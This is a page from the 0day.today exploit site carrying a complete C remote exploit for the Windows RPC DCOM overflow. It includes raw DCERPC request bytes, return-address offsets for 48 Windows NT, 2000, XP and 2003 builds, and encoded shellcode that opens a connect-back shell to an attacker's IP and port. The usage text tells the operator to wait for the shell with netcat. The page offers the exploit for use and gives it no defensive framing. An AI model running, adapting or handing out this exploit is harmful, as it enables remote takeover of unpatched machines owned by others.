0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Windows (RPC DCOM) Remote Exploit (48 Targets)
[=================================================
MS Windows (RPC DCOM) Remote Exploit (48 Targets)
=================================================
//////////////////////////////////////////////////////////////////////////
//
// Windows RPC DCOM Remote Exploit with 48 TARGETS (Fixed)
//
//////////////////////////////////////////////////////////////////////////
//
// English - French - Chinese - Polish - German
// Japanese - Korean - Mexican - Kenyan
//
// Tks to all wolrd wide contributors (Public Property)
//
// New Targets ? contrib@k-otik.com
//
//////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
#define DWORD unsigned long
WSADATA wsa;
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
/* Myam add OFFSETS*/
char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */
char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */
char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */
char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */
char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */
char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */
char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */
char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1 same offset as win2kjp_sp1 ??*/
char win2ksp2kr[] = "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */
char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */
char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */
char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */
char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */
char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */
char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* Germanh win2 sp3 */
char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2 sp4 1 */
char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2 sp4 2 */
char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */
char Win2ksp1fr[] = "\x4b\x3e\xe4\x77"; /* French win2k Server SP1 */
char Win2ksp4fr[] = "\x56\xc2\xe2\x77"; /* French win2k Server SP4 */
char winxpsp0fr[] = "\x4a\x75\xd4\x77"; /* French win xp no sp */
char winxpsp1fr[] = "\xfc\x18\xd4\x77"; /* French win xp sp 1 */
char win2ksp3big[] = "\x25\x2b\xaa\x77";
char win2ksp4big[] = "\x29\x4c\xdf\x77";
char winxpsp01big[] = "\xfb\x7b\xa1\x71";
/* Test this offset
( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
Windows 2000 (no-service-pack) English 0x77e33f6d
0x77f92a9b
0x77e2afc5
0x772254b0 win2k3
0x77E829E3 / 0x77E83587 kokanin win2k sp3
*/
unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"
"\x29\x4c\xdf\x77" //sp4
//"\x29\x2c\xe2\x77"//0x77e22c29
"\x38\x6e\x16\x76\x0d\x6e\x16\x76" //??????????
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
"\x93\x40\xe2\xfa"
// code
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
int main(int argc,char ** argv)
{
int len, len1, sockfd;
short port=135;
struct hostent *he;
struct sockaddr_in their_addr;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short port1;
DWORD cb;
WSAStartup(MAKEWORD(2,0),&wsa);
printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");
printf("RPC DCOM Remote Exploit modified by www.k-otiK.com ;>\n");
if(argc<5)
{
printf("[<$>] RPC Remote Windows Exploit\n");
printf("[<$>] Modified by www.k-otiK.com - New Exploits Database\n");
printf("[<$>] Thanks to b@digitalwaste.org + J?rgen_Haa? + woutiir \n");
printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
printf("[<$>] On connect back nc -lp cbport\n");
printf("[<$>] Targets: 0 WinNT English +sp4\n");
printf("[<$>] 1 WinNT China +sp5\n");
printf("[<$>] 2 WinNT China +sp6\n");
printf("[<$>] 3 WinNT China +sp6a\n");
printf("[<$>] 4 Win2k Polish nosp ver 5.00.2195\n");
printf("[<$>] 5 Win2k Polish +sp3 ver 5.00.2195\n");
printf("[<$>] 6 Win2k Spanish +sp4\n");
printf("[<$>] 7 Win2k English nosp 1\n");
printf("[<$>] 8 Win2k English nosp 2\n");
printf("[<$>] 9 Win2k English +sp1\n");
printf("[<$>] 10 Win2k English +sp2 1\n");
printf("[<$>] 11 Win2k English +sp2 2\n");
printf("[<$>] 12 Win2k English +sp3 1\n");
printf("[<$>] 13 Win2k English +sp3 2\n");
printf("[<$>] 14 Win2k English +sp4\n");
printf("[<$>] 15 Win2k China nosp\n");
printf("[<$>] 16 Win2k China +sp1\n");
printf("[<$>] 17 Win2k China +sp2\n");
printf("[<$>] 18 Win2k China +sp3\n");
printf("[<$>] 19 Win2k China +sp4\n");
printf("[<$>] 20 Win2k German +sp3\n");
printf("[<$>] 21 Win2k Japanese nosp\n");
printf("[<$>] 22 Win2k Japanese +sp1\n");
printf("[<$>] 23 Win2k Japanese +sp2\n");
printf("[<$>] 24 Win2k Korea nosp\n");
printf("[<$>] 25 Win2k Korea +sp1\n");
printf("[<$>] 26 Win2k Korea +sp2\n");
printf("[<$>] 27 Win2k Mexican nosp\n");
printf("[<$>] 28 Win2k Mexican +sp1\n");
printf("[<$>] 29 Win2k Kenya nosp\n");
printf("[<$>] 30 Win2k Kenya +sp1\n");
printf("[<$>] 31 Win2k Kenya +sp2\n");
printf("[<$>] 32 WinXP English nosp ver 5.1.2600\n");
printf("[<$>] 33 WinXP English +sp1 1\n");
printf("[<$>] 34 WinXP English +sp1 2\n");
printf("[<$>] 35 WinXP English +sp2\n");
printf("[<$>] 36 Win2k3 English nosp\n");
printf("[<$>] 37 Win2k german sp3\n");
printf("[<$>] 38 Win2k german sp4\n");
printf("[<$>] 39 Win2k german sp4 2\n");
printf("[<$>] 40 Winxp german sp1 2\n");
printf("[<$>] 41 Win2k french sp1\n");
printf("[<$>] 42 Win2k french sp4\n");
printf("[<$>] 43 Winxp french sp0\n");
printf("[<$>] 44 Winxp french sp1\n");
printf("[<$>] 45 Win2k big5 sp3\n");
printf("[<$>] 46 Win2k big5 sp4\n");
printf("[<$>] 47 Winxp big5 sp0\n");
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
perror("gethostbyname");
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct
sockaddr)) == -1) {
printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);
exit(1);
}
if(atoi(argv[4])==0)
memcpy(sc+36,winntsp4eng,sizeof(winntsp4eng));
else if (atoi(argv[4])==1)
memcpy(sc+36,winntsp5cn,sizeof(winntsp5cn));
else if (atoi(argv[4])==2)
memcpy(sc+36,winntsp6cn,sizeof(winntsp6cn));
else if (atoi(argv[4])==3)
memcpy(sc+36,winntsp6acn,sizeof(winntsp6acn));
else if (atoi(argv[4])==4)
memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
else if (atoi(argv[4])==5)
memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
else if (atoi(argv[4])==6)
memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
else if (atoi(argv[4])==7)
memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
else if (atoi(argv[4])==8)
memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
else if (atoi(argv[4])==9)
memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
else if (atoi(argv[4])==10)
memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
else if (atoi(argv[4])==11)
memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
else if (atoi(argv[4])==12)
memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
else if (atoi(argv[4])==13)
memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
else if (atoi(argv[4])==14)
memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
else if (atoi(argv[4])==15)
memcpy(sc+36,win2knospchi,sizeof(win2knospchi));
else if (atoi(argv[4])==16)
memcpy(sc+36,win2ksp1chi,sizeof(win2ksp1chi));
else if (atoi(argv[4])==17)
memcpy(sc+36,win2ksp2chi,sizeof(win2ksp2chi));
else if (atoi(argv[4])==18)
memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
else if (atoi(argv[4])==19)
memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
else if (atoi(argv[4])==20)
memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
else if (atoi(argv[4])==21)
memcpy(sc+36,win2knospjap,sizeof(win2knospjap));
else if (atoi(argv[4])==22)
memcpy(sc+36,win2ksp1jap,sizeof(win2ksp1jap));
else if (atoi(argv[4])==23)
memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
else if (atoi(argv[4])==24)
memcpy(sc+36,win2knospkr,sizeof(win2knospkr));
else if (atoi(argv[4])==25)
memcpy(sc+36,win2ksp1kr,sizeof(win2ksp1kr));
else if (atoi(argv[4])==26)
memcpy(sc+36,win2ksp2kr,sizeof(win2ksp2kr));
else if (atoi(argv[4])==27)
memcpy(sc+36,win2knospmx,sizeof(win2knospmx));
else if (atoi(argv[4])==28)
memcpy(sc+36,win2ksp1mx,sizeof(win2ksp1mx));
else if (atoi(argv[4])==29)
memcpy(sc+36,win2knospken,sizeof(win2knospken));
else if (atoi(argv[4])==30)
memcpy(sc+36,win2ksp1ken,sizeof(win2ksp1ken));
else if (atoi(argv[4])==31)
memcpy(sc+36,win2ksp2ken,sizeof(win2ksp2ken));
else if (atoi(argv[4])==32)
memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
else if (atoi(argv[4])==33)
memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
else if (atoi(argv[4])==34)
memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
else if (atoi(argv[4])==35)
memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
else if (atoi(argv[4])==36)
memcpy(sc+36,win2k3nospeng,sizeof(win2k3nospeng));
else if (atoi(argv[4])==37)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp3ger));
else if (atoi(argv[4])==38)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger1));
else if (atoi(argv[4])==39)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger2));
else if (atoi(argv[4])==40)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1ger));
else if (atoi(argv[4])==41)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp1fr));
else if (atoi(argv[4])==42)
memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4fr));
else if (atoi(argv[4])==43)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp0fr));
else if (atoi(argv[4])==44)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1fr));
else if (atoi(argv[4])==45)
memcpy(sc+36,win2k3nospeng,sizeof(win2ksp3big));
else if (atoi(argv[4])==46)
memcpy(sc+36,win2k3nospeng,sizeof(win2ksp4big));
else if (atoi(argv[4])==47)
memcpy(sc+36,win2k3nospeng,sizeof(winxpsp01big));
port1 = htons(atoi(argv[3]));
port1 ^= 0x9393;
cb=inet_addr(argv[2]);
cb ^= 0x93939393;
*(unsigned short *)&sc[330+0x30] = port1;
*(unsigned int *)&sc[335+0x30] = cb;
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);
*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
printf("Send failed pussy.\n");
exit(1);
}
len=recv(sockfd,buf1,1000,0);
if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {
printf("Send failed pussy\n");
exit (1);
}
len=recv(sockfd,buf1,1024,0);
return 0;
}
# 0day.today [2024-11-16] #